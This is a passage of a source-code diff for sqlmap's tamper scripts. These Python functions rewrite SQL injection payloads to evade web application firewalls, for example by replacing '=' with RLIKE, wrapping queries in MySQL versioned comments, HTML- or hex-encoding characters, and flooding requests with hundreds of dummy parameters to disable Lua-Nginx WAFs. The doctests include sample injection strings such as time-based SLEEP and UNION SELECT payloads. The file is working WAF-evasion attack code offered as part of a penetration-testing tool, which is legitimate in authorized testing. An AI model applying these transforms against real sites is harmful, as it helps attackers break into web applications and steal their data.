+__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart + + Tested against: + * MySQL 4, 5.0 and 5.5 + + Notes: + * Useful to bypass weak and bespoke web application firewalls that + filter the equal character ('=') + + >>> tamper('SELECT * FROM users WHERE id=1') + 'SELECT * FROM users WHERE id RLIKE 1' + """ + + retVal = payload + + if payload: + retVal = re.sub(r"\s*=\s*", " RLIKE ", retVal) + + return retVal diff --git a/tamper/escapequotes.py b/tamper/escapequotes.py new file mode 100644 index 00000000000..aba948a065f --- /dev/null +++ b/tamper/escapequotes.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Slash escape single and double quotes (e.g. ' -> \') + + >>> tamper('1" AND SLEEP(5)#') + '1\\\\" AND SLEEP(5)#' + """ + + return payload.replace("'", "\\'").replace('"', '\\"') diff --git a/tamper/greatest.py b/tamper/greatest.py index 8b0abe0586f..742b090c1b6 100644 --- a/tamper/greatest.py +++ b/tamper/greatest.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re @@ -18,10 +18,6 @@ def tamper(payload, **kwargs): """ Replaces greater than operator ('>') with 'GREATEST' counterpart - Example: - * Input: 'A > B' - * Output: 'GREATEST(A, B + 1) = A' - Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g @@ -32,15 +28,18 @@ def tamper(payload, **kwargs): filter the greater than character * The GREATEST clause is a widespread SQL command. Hence, this tamper script should work against majority of databases + + >>> tamper('1 AND A > B') + '1 AND GREATEST(A,B+1)=A' """ retVal = payload if payload: - match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload) + match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload) if match: - _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(4), match.group(5), match.group(4)) + _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3)) retVal = retVal.replace(match.group(0), _) return retVal diff --git a/tamper/halfversionedmorekeywords.py b/tamper/halfversionedmorekeywords.py index 6a2d18c7502..cb8dc946f7a 100644 --- a/tamper/halfversionedmorekeywords.py +++ b/tamper/halfversionedmorekeywords.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os @@ -21,11 +21,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds versioned MySQL comment before each keyword - - Example: - * Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa - * Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa + Adds (MySQL) versioned comment before each keyword Requirement: * MySQL < 5.1 @@ -38,6 +34,9 @@ def tamper(payload, **kwargs): back-end database management system is MySQL * Used during the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html + + >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") + "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" """ def process(match): @@ -50,7 +49,7 @@ def process(match): retVal = payload if payload: - retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal) + retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, retVal) retVal = retVal.replace(" /*!0", "/*!0") return retVal diff --git a/tamper/hex2char.py b/tamper/hex2char.py new file mode 100644 index 00000000000..89bcc32c8c6 --- /dev/null +++ b/tamper/hex2char.py @@ -0,0 +1,49 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.convert import decodeHex +from lib.core.convert import getOrds +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) + +def tamper(payload, **kwargs): + """ + Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart + + Requirement: + * MySQL + + Tested against: + * MySQL 4, 5.0 and 5.5 + + Notes: + * Useful in cases when web application does the upper casing + + >>> tamper('SELECT 0xdeadbeef') + 'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))' + """ + + retVal = payload + + if payload: + for match in re.finditer(r"\b0x([0-9a-f]+)\b", retVal): + if len(match.group(1)) > 2: + result = "CONCAT(%s)" % ','.join("CHAR(%d)" % _ for _ in getOrds(decodeHex(match.group(1)))) + else: + result = "CHAR(%d)" % ord(decodeHex(match.group(1))) + retVal = retVal.replace(match.group(0), result) + + return retVal diff --git a/tamper/hexentities.py b/tamper/hexentities.py new file mode 100644 index 00000000000..9b060673a04 --- /dev/null +++ b/tamper/hexentities.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + HTML encode in hexadecimal (using code points) all characters (e.g. ' -> 1) + + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' + """ + + retVal = payload + + if payload: + retVal = "" + i = 0 + + while i < len(payload): + retVal += "&#x%s;" % format(ord(payload[i]), "x") + i += 1 + + return retVal diff --git a/tamper/htmlencode.py b/tamper/htmlencode.py new file mode 100644 index 00000000000..ce09386be77 --- /dev/null +++ b/tamper/htmlencode.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> ') + + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' + """ + + if payload: + payload = re.sub(r"&#(\d+);", lambda match: chr(int(match.group(1))), payload) # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5203 + payload = re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) + + return payload diff --git a/tamper/if2case.py b/tamper/if2case.py new file mode 100644 index 00000000000..e43c4f8f217 --- /dev/null +++ b/tamper/if2case.py @@ -0,0 +1,71 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'doc/COPYING' for copying permission +""" + +from lib.core.compat import xrange +from lib.core.enums import PRIORITY +from lib.core.settings import REPLACEMENT_MARKER + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces instances like 'IF(A, B, C)' with 'CASE WHEN (A) THEN (B) ELSE (C) END' counterpart + + Requirement: + * MySQL + * SQLite (possibly) + * SAP MaxDB (possibly) + + Tested against: + * MySQL 5.0 and 5.5 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that filter the IF() functions + + >>> tamper('IF(1, 2, 3)') + 'CASE WHEN (1) THEN (2) ELSE (3) END' + >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)') + 'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END' + """ + + if payload and payload.find("IF") > -1: + payload = payload.replace("()", REPLACEMENT_MARKER) + while payload.find("IF(") > -1: + index = payload.find("IF(") + depth = 1 + commas, end = [], None + + for i in xrange(index + len("IF("), len(payload)): + if depth == 1 and payload[i] == ',': + commas.append(i) + + elif depth == 1 and payload[i] == ')': + end = i + break + + elif payload[i] == '(': + depth += 1 + + elif payload[i] == ')': + depth -= 1 + + if len(commas) == 2 and end: + a = payload[index + len("IF("):commas[0]].strip("()") + b = payload[commas[0] + 1:commas[1]].lstrip().strip("()") + c = payload[commas[1] + 1:end].lstrip().strip("()") + newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c) + payload = payload[:index] + newVal + payload[end + 1:] + else: + break + + payload = payload.replace(REPLACEMENT_MARKER, "()") + + return payload diff --git a/tamper/ifnull2casewhenisnull.py b/tamper/ifnull2casewhenisnull.py new file mode 100644 index 00000000000..36c8eb9462d --- /dev/null +++ b/tamper/ifnull2casewhenisnull.py @@ -0,0 +1,64 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'doc/COPYING' for copying permission +""" + +from lib.core.compat import xrange +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart + + Requirement: + * MySQL + * SQLite (possibly) + * SAP MaxDB (possibly) + + Tested against: + * MySQL 5.0 and 5.5 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that filter the IFNULL() functions + + >>> tamper('IFNULL(1, 2)') + 'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END' + """ + + if payload and payload.find("IFNULL") > -1: + while payload.find("IFNULL(") > -1: + index = payload.find("IFNULL(") + depth = 1 + comma, end = None, None + + for i in xrange(index + len("IFNULL("), len(payload)): + if depth == 1 and payload[i] == ',': + comma = i + + elif depth == 1 and payload[i] == ')': + end = i + break + + elif payload[i] == '(': + depth += 1 + + elif payload[i] == ')': + depth -= 1 + + if comma and end: + _ = payload[index + len("IFNULL("):comma] + __ = payload[comma + 1:end].lstrip() + newVal = "CASE WHEN ISNULL(%s) THEN (%s) ELSE (%s) END" % (_, __, _) + payload = payload[:index] + newVal + payload[end + 1:] + else: + break + + return payload diff --git a/tamper/ifnull2ifisnull.py b/tamper/ifnull2ifisnull.py index c8e2fd44af9..a6399f290dd 100644 --- a/tamper/ifnull2ifisnull.py +++ b/tamper/ifnull2ifisnull.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST @@ -14,11 +15,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' - - Example: - * Input: IFNULL(1, 2) - * Output: IF(ISNULL(1), 2, 1) + Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart Requirement: * MySQL @@ -31,6 +28,9 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass very weak and bespoke web application firewalls that filter the IFNULL() function + + >>> tamper('IFNULL(1, 2)') + 'IF(ISNULL(1),2,1)' """ if payload and payload.find("IFNULL") > -1: @@ -55,7 +55,7 @@ def tamper(payload, **kwargs): if comma and end: _ = payload[index + len("IFNULL("):comma] - __ = payload[comma + 1:end] + __ = payload[comma + 1:end].lstrip() newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _) payload = payload[:index] + newVal + payload[end + 1:] else: diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py new file mode 100644 index 00000000000..bb977b90229 --- /dev/null +++ b/tamper/informationschemacomment.py @@ -0,0 +1,27 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def tamper(payload, **kwargs): + """ + Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier + + >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES') + 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES' + """ + + retVal = payload + + if payload: + retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload) + + return retVal diff --git a/tamper/least.py b/tamper/least.py new file mode 100644 index 00000000000..a4f84a5a9a3 --- /dev/null +++ b/tamper/least.py @@ -0,0 +1,45 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces greater than operator ('>') with 'LEAST' counterpart + + Tested against: + * MySQL 4, 5.0 and 5.5 + * Oracle 10g + * PostgreSQL 8.3, 8.4, 9.0 + + Notes: + * Useful to bypass weak and bespoke web application firewalls that + filter the greater than character + * The LEAST clause is a widespread SQL command. Hence, this + tamper script should work against majority of databases + + >>> tamper('1 AND A > B') + '1 AND LEAST(A,B+1)=B+1' + """ + + retVal = payload + + if payload: + match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload) + + if match: + _ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4)) + retVal = retVal.replace(match.group(0), _) + + return retVal diff --git a/tamper/lowercase.py b/tamper/lowercase.py new file mode 100644 index 00000000000..ab0fa2e9a0c --- /dev/null +++ b/tamper/lowercase.py @@ -0,0 +1,45 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.data import kb +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces each keyword character with lower case value (e.g. SELECT -> select) + + Tested against: + * Microsoft SQL Server 2005 + * MySQL 4, 5.0 and 5.5 + * Oracle 10g + * PostgreSQL 8.3, 8.4, 9.0 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that has poorly written permissive regular expressions + + >>> tamper('INSERT') + 'insert' + """ + + retVal = payload + + if payload: + for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): + word = match.group() + + if word.upper() in kb.keywords: + retVal = retVal.replace(word, word.lower()) + + return retVal diff --git a/tamper/luanginx.py b/tamper/luanginx.py new file mode 100644 index 00000000000..aca3e3a1b10 --- /dev/null +++ b/tamper/luanginx.py @@ -0,0 +1,37 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import random +import string + +from lib.core.compat import xrange +from lib.core.enums import HINT +from lib.core.enums import PRIORITY +from lib.core.settings import DEFAULT_GET_POST_DELIMITER + +__priority__ = PRIORITY.NORMAL + +def tamper(payload, **kwargs): + """ + LUA-Nginx WAFs Bypass (e.g. Cloudflare) + + Reference: + * https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/ + + Notes: + * Lua-Nginx WAFs do not support processing of more than 100 parameters + + >>> random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload) + '34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=&RQ=&zY=&nk=&1 AND 2>1' + """ + + hints = kwargs.get("hints", {}) + delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER) + + hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.ascii_letters + string.digits, 2)) for _ in xrange(500)) + + return payload diff --git a/tamper/luanginxmore.py b/tamper/luanginxmore.py new file mode 100644 index 00000000000..1d360db1005 --- /dev/null +++ b/tamper/luanginxmore.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import random +import string +import os + +from lib.core.compat import xrange +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import HINT +from lib.core.enums import PRIORITY +from lib.core.settings import DEFAULT_GET_POST_DELIMITER + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run on POST requests" % (os.path.basename(__file__).split(".")[0])) + +def tamper(payload, **kwargs): + """ + LUA-Nginx WAFs Bypass (e.g. Cloudflare) with 4.2 million parameters + + Reference: + * https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/ + + Notes: + * Lua-Nginx WAFs do not support processing of huge number of parameters + """ + + hints = kwargs.get("hints", {}) + delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER) + + hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.ascii_letters + string.digits, 2)) for _ in xrange(4194304)) + + return payload diff --git a/tamper/misunion.py b/tamper/misunion.py new file mode 100644 index 00000000000..062f049cc0c --- /dev/null +++ b/tamper/misunion.py @@ -0,0 +1,36 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) + +def tamper(payload, **kwargs): + """ + Replaces instances of UNION with -.1UNION + + Requirement: + * MySQL + + Notes: + * Reference: https://raw.githubusercontent.com/y0unge/Notes/master/SQL%20Injection%20WAF%20Bypassing%20shortcut.pdf + + >>> tamper('1 UNION ALL SELECT') + '1-.1UNION ALL SELECT' + >>> tamper('1" UNION ALL SELECT') + '1"-.1UNION ALL SELECT' + """ + + return re.sub(r"(?i)\s+(UNION )", r"-.1\g<1>", payload) if payload else payload diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py index 47ada21c1fc..458497706cd 100644 --- a/tamper/modsecurityversioned.py +++ b/tamper/modsecurityversioned.py @@ -1,25 +1,25 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import os + from lib.core.common import randomInt +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHER def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): """ - Embraces complete query with versioned comment - - Example: - * Input: 1 AND 2>1-- - * Output: 1 /*!30000AND 2>1*/-- + Embraces complete query with (MySQL) versioned comment Requirement: * MySQL @@ -28,7 +28,12 @@ def tamper(payload, **kwargs): * MySQL 5.0 Notes: - * Useful to bypass ModSecurity WAF/IDS + * Useful to bypass ModSecurity WAF + + >>> import random + >>> random.seed(0) + >>> tamper('1 AND 2>1--') + '1 /*!30963AND 2>1*/--' """ retVal = payload diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py index f1548db7896..0cf1dd511aa 100644 --- a/tamper/modsecurityzeroversioned.py +++ b/tamper/modsecurityzeroversioned.py @@ -1,24 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import os + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHER def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): """ - Embraces complete query with zero-versioned comment - - Example: - * Input: 1 AND 2>1-- - * Output: 1 /*!00000AND 2>1*/-- + Embraces complete query with (MySQL) zero-versioned comment Requirement: * MySQL @@ -27,7 +27,10 @@ def tamper(payload, **kwargs): * MySQL 5.0 Notes: - * Useful to bypass ModSecurity WAF/IDS + * Useful to bypass ModSecurity WAF + + >>> tamper('1 AND 2>1--') + '1 /*!00000AND 2>1*/--' """ retVal = payload diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py index ec4303b7897..ab02a0c911c 100644 --- a/tamper/multiplespaces.py +++ b/tamper/multiplespaces.py @@ -1,14 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import random import re from lib.core.data import kb +from lib.core.datatype import OrderedSet from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL @@ -18,32 +19,32 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds multiple spaces around SQL keywords - - Example: - * Input: UNION SELECT - * Output: UNION SELECT + Adds multiple spaces (' ') around SQL keywords Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt + + >>> random.seed(0) + >>> tamper('1 UNION SELECT foobar') + '1 UNION SELECT foobar' """ retVal = payload if payload: - words = set() + words = OrderedSet() - for match in re.finditer(r"[A-Za-z_]+", payload): + for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group() if word.upper() in kb.keywords: words.add(word) for word in words: - retVal = re.sub("(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randrange(1, 4), word, ' ' * random.randrange(1, 4)), retVal) - retVal = re.sub("(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randrange(1, 4), word), retVal) + retVal = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randint(1, 4), word, ' ' * random.randint(1, 4)), retVal) + retVal = re.sub(r"(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randint(1, 4), word), retVal) return retVal diff --git a/tamper/nonrecursivereplacement.py b/tamper/nonrecursivereplacement.py deleted file mode 100644 index c5b4a891862..00000000000 --- a/tamper/nonrecursivereplacement.py +++ /dev/null @@ -1,41 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import random -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def tamper(payload, **kwargs): - """ - Replaces predefined SQL keywords with representations - suitable for replacement (e.g. .replace("SELECT", "")) filters - - Example: - * Input: 1 UNION SELECT 2-- - * Output: 1 UNUNIONION SELSELECTECT 2-- - - Notes: - * Useful to bypass very weak custom filters - """ - - keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE") - retVal = payload - - warnMsg = "currently only couple of keywords are being processed %s. " % str(keywords) - warnMsg += "You can set it manually according to your needs" - singleTimeWarnMessage(warnMsg) - - if payload: - for keyword in keywords: - _ = random.randint(1, len(keyword) - 1) - retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal) - - return retVal diff --git a/tamper/ord2ascii.py b/tamper/ord2ascii.py new file mode 100644 index 00000000000..7e59ecb2ae6 --- /dev/null +++ b/tamper/ord2ascii.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces ORD() occurences with equivalent ASCII() calls + Requirement: + * MySQL + >>> tamper("ORD('42')") + "ASCII('42')" + """ + + retVal = payload + + if payload: + retVal = re.sub(r"(?i)\bORD\(", "ASCII(", payload) + + return retVal diff --git a/tamper/overlongutf8.py 